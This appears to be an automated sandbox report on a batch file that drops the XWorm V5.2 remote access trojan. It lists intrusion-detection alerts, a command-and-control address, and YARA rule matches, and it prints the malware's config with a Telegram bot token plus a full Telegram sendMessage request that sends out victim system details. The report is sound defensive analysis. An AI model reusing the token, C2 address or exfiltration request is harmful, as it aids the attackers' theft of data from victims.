2025-03-07T17:19:51.521849+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:51.645150+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:51.770950+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:51.895488+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:52.035780+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:52.196525+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:52.332633+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:52.488879+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:52.613967+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:52.770143+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:52.908138+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:53.035749+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:53.180330+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:53.317079+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:53.474802+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:53.599653+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:53.755882+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:53.890904+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:54.020085+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:54.177107+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:54.317369+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:54.473259+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:54.625536+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:54.770179+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:54.926407+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:55.051455+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:55.191993+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:55.362996+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:55.491023+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:55.631065+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:55.789012+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:55.926516+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:56.067198+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:56.207835+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP

ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T17:18:58.941340+0100	2855924	1	Malware Command and Control Activity Detected	192.168.2.6	49688	193.32.177.63	6000	TCP

ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T17:19:42.325347+0100	2853191	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP

ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T17:19:41.690209+0100	2853192	1	Malware Command and Control Activity Detected	192.168.2.6	49688	193.32.177.63	6000	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T17:18:41.790973+0100	1810007	1	Potentially Bad Traffic	192.168.2.6	49687	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0000000B.00000002.1553871152.0000022819B39000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["193.32.177.63"], "Port": 6000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram Token": "7238632531:AAGCQZAh03hAwOcuP9HUeoAP5AQV0o0tp24", "Telegram Chatid": "8080837794", "Version": "XWorm V5.2"}

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 93.9% probability

Sample uses string decryption to hide its real strings

Source: 0000000B.00000002.1553871152.0000022819B39000.00000004.00000800.00020000.00000000.sdmp	String decryptor: 193.32.177.63
Source: 0000000B.00000002.1553871152.0000022819B39000.00000004.00000800.00020000.00000000.sdmp	String decryptor: 6000
Source: 0000000B.00000002.1553871152.0000022819B39000.00000004.00000800.00020000.00000000.sdmp	String decryptor: <123456789>
Source: 0000000B.00000002.1553871152.0000022819B39000.00000004.00000800.00020000.00000000.sdmp	String decryptor: <Xwormmm>
Source: 0000000B.00000002.1553871152.0000022819B39000.00000004.00000800.00020000.00000000.sdmp	String decryptor: XWorm V5.2
Source: 0000000B.00000002.1553871152.0000022819B39000.00000004.00000800.00020000.00000000.sdmp	String decryptor: USB.exe

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49687 version: TLS 1.2

Source:	Binary string: <>c__DisplayClass6_0<>9__0<Main>b__0IEnumerable`1List`1ReadInt32Dictionary`2ReadInt16get_UTF8<Module>CreateFileAGetUACPAGE_EXECUTE_READWRITEQxwgIQJtuynihFkPbNFN<>OMODULEINFOSystem.IOAESbavkmsLBGTsuCIUPxeNajklsXCgRhERjiyTqCLuQEHmaFtfZkUJmjvFFFlvXCosturacostura.metadatamscorlibSystem.Collections.GenericsrcReadThreadLoadGetPayloadAddAesManagedisAttachedInterlockedcostura.costura.pdb.compressedcostura.costura.dll.compressedcostura.microsoft.win32.taskscheduler.dll.compressedcostura.ja.microsoft.win32.taskscheduler.resources.dll.compressedcostura.de.microsoft.win32.taskscheduler.resources.dll.compressedcostura.pl.microsoft.win32.taskscheduler.resources.dll.compressedcostura.zh-cn.microsoft.win32.taskscheduler.resources.dll.compressedcostura.fr.microsoft.win32.taskscheduler.resources.dll.compressedcostura.tr.microsoft.win32.taskscheduler.resources.dll.compressedcostura.es.microsoft.win32.taskscheduler.resources.dll.compressedcostura.it.microsoft.win32.taskscheduler.resources.dll.compressedcostura.zh-hant.microsoft.win32.taskscheduler.resources.dll.compressedcostura.ru.microsoft.win32.taskscheduler.resources.dll.compressedcostura.sv.microsoft.win32.taskscheduler.resources.dll.compressedisElevatedEncodeCommandGetMethodsubscribeReplaceTaskServiceGetResourceset_ModeshareModePaddingModeCompressionModeCipherModeget_UnicodeSizeOfImageget_MessageExchangenullCacheInvokeEnumerableIDisposableGetModuleHandleCloseHandlehandletemplateFileMapViewOfFilefileIsInRoleWindowsBuiltInRoleConsolehModulemoduleget_NameprocNameGetAssemblyResourceNamelpFileNamefileNamemoduleNameget_FullNamefullNameGetNamerequestedAssemblyNamenameReadLineWriteLineValueTypeGetTypeSystem.CorecultureMethodBaseDisposeElevateWriteCompilerGeneratedAttributeGuidAttributeUnverifiableCodeAttributeDebuggableAttributeComVisibleAttributeAssemblyTitleAttributeAssemblyTrademarkAttributeTargetFrameworkAttributeAssemblyFileVersionAttributeAssemblyConfigurationAttributeAssemblyDescriptionAttributeCompilationRelaxationsAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyCompanyAttributeRuntimeCompatibilityAttributeReadByte_GetConfigValueTryGetValueadd_AssemblyResolveget_SizedwSizesizePyramid.Phantom.Stager.ConfigconfigSystem.Threadingset_PaddingEncodingSystem.Runtime.VersioningCreateFileMappingFromBase64StringToBase64StringCultureToStringGetStringAttachmaximumSizeHighfileOffsetHighget_LengthEndsWithnullCacheLockTransformFinalBlockUnhookNewTaskFiTaMpiODlMarshalSystem.Security.Principalget_PrincipalTaskPrincipalWindowsPrincipalset_RunLevelTaskRunLevelBaseOfDllUnhookDllkernel32.dllpsapi.dllmsvcrt.dllReadStreamLoadStreamGetManifestResourceStreamDeflateStreamMemoryStreamstreamProgramset_ItemOperatingSystemSymmetricAlgorithmICryptoTransformset_HiddenMainAppDomainget_CurrentDomainget_OSVersionget_VersionFodyVersionSystem.IO.CompressionGetModuleInformationdestinationSystem.GlobalizationExecActionSystem.ReflectionActionCollectionTriggerCollectionRegisterTaskDefinitionset_PositioncreationDispositionExceptionS
Source:	Binary string: C:\Users\dahal\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net45\Microsoft.Win32.TaskScheduler.pdbSHA256 source: powershell.exe, 00000003.00000002.2718136098.0000024311715000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1553871152.0000022819A6F000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: costura.costura.pdb.compressed source: powershell.exe, 00000003.00000002.2718136098.0000024311715000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2718136098.0000024310CFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1553871152.0000022819A6F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1553871152.000002281B5C4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: costura.costura.pdb.compressed8 source: powershell.exe, 00000003.00000002.2338047448.00000243022CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1553871152.0000022819A6F000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: costura.costura.pdb.compressed\|\|\|Costura.pdb\|806F4C19B2D7FD9E3B836269EC07647019A29E95\|7960 source: powershell.exe, 00000003.00000002.2718136098.0000024311715000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2718136098.0000024310CFB000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahal\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net45\Microsoft.Win32.TaskScheduler.pdb source: powershell.exe, 00000003.00000002.2718136098.0000024311715000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1553871152.0000022819A6F000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2852873 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 : 192.168.2.6:49692 -> 193.32.177.63:6000
Source: Network traffic	Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.6:49692 -> 193.32.177.63:6000
Source: Network traffic	Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49688 -> 193.32.177.63:6000
Source: Network traffic	Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 193.32.177.63:6000 -> 192.168.2.6:49688
Source: Network traffic	Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.6:49688 -> 193.32.177.63:6000
Source: Network traffic	Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 193.32.177.63:6000 -> 192.168.2.6:49688
Source: Network traffic	Suricata IDS: 2853192 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound : 192.168.2.6:49688 -> 193.32.177.63:6000
Source: Network traffic	Suricata IDS: 2853191 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound : 193.32.177.63:6000 -> 192.168.2.6:49688
Source: Network traffic	Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 193.32.177.63:6000 -> 192.168.2.6:49692
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:49687 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.6:49687 -> 149.154.167.220:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 193.32.177.63

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic

TCP traffic: 192.168.2.6:49688 -> 193.32.177.63:6000

Source: global traffic

HTTP traffic detected: GET /bot7238632531:AAGCQZAh03hAwOcuP9HUeoAP5AQV0o0tp24/sendMessage?chat_id=8080837794&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AD7AEA3DBB334FF534DC1%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20LHX9B%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 149.154.167.220 149.154.167.220

Source: Joe Sandbox View

ASN Name: AS40676US AS40676US

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63
Source: unknown	TCP traffic detected without corresponding DNS query: 193.32.177.63

Source: global traffic

DNS traffic detected: DNS query: api.telegram.org

Source: powershell.exe, 00000003.00000002.2718136098.0000024310072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.2338047448.0000024300226000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.2338047448.0000024300001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1553871152.00000228154C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.2338047448.0000024300226000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.2338047448.0000024300001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1553871152.00000228154C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000003.00000002.2338047448.00000243022CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: powershell.exe, 00000003.00000002.2338047448.00000243022CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1553871152.0000022819B39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: powershell.exe, 00000003.00000002.2338047448.00000243022CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7238632531:AAGCQZAh03hAwOcuP9HUeoAP5AQV0o0tp24/sendMessage?chat_id=80808
Source: powershell.exe, 00000003.00000002.2718136098.0000024310072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.2718136098.0000024310072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.2718136098.0000024310072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.2338047448.0000024300226000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.2718136098.0000024311715000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1553871152.0000022819A6F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/dahall/taskscheduler
Source: powershell.exe, 00000003.00000002.2718136098.0000024310072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49687
Source: unknown	Network traffic detected: HTTP traffic on port 49687 -> 443

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49687 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 11.2.powershell.exe.22819b4d148.4.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 11.2.powershell.exe.22819b56788.6.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi64_332.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: 3.2.powershell.exe.24302f3c610.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 3.2.powershell.exe.24302f46890.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 11.2.powershell.exe.22819b56788.6.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 11.2.powershell.exe.22819b56788.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.powershell.exe.22819b4d148.4.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 11.2.powershell.exe.22819b4d148.4.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 3.2.powershell.exe.24302f46890.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 11.2.powershell.exe.22819b4d148.4.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 11.2.powershell.exe.22819b4d148.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 3.2.powershell.exe.24302f3c610.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 11.2.powershell.exe.22819b56788.6.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 11.2.powershell.exe.22819b56788.6.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000002.1553871152.0000022819B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 332, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Found large BAT file

Source: georgefloyd.bat

Static file information: 4474706

Performs an instant shutdown (NtRaiseHardError)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Hard error raised: shutdown

Jump to behavior

Source: amsi64_332.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 3.2.powershell.exe.24302f3c610.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 3.2.powershell.exe.24302f46890.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 11.2.powershell.exe.22819b56788.6.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 11.2.powershell.exe.22819b56788.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 11.2.powershell.exe.22819b4d148.4.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 11.2.powershell.exe.22819b4d148.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 3.2.powershell.exe.24302f46890.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 11.2.powershell.exe.22819b4d148.4.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 11.2.powershell.exe.22819b4d148.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 3.2.powershell.exe.24302f3c610.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 11.2.powershell.exe.22819b56788.6.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 11.2.powershell.exe.22819b56788.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000B.00000002.1553871152.0000022819B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: powershell.exe PID: 332, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: 3.2.powershell.exe.24311715540.7.raw.unpack, AES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.powershell.exe.22819b4d148.4.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.powershell.exe.22819b4d148.4.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.powershell.exe.22819b4d148.4.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.powershell.exe.22819b56788.6.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.powershell.exe.22819b56788.6.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
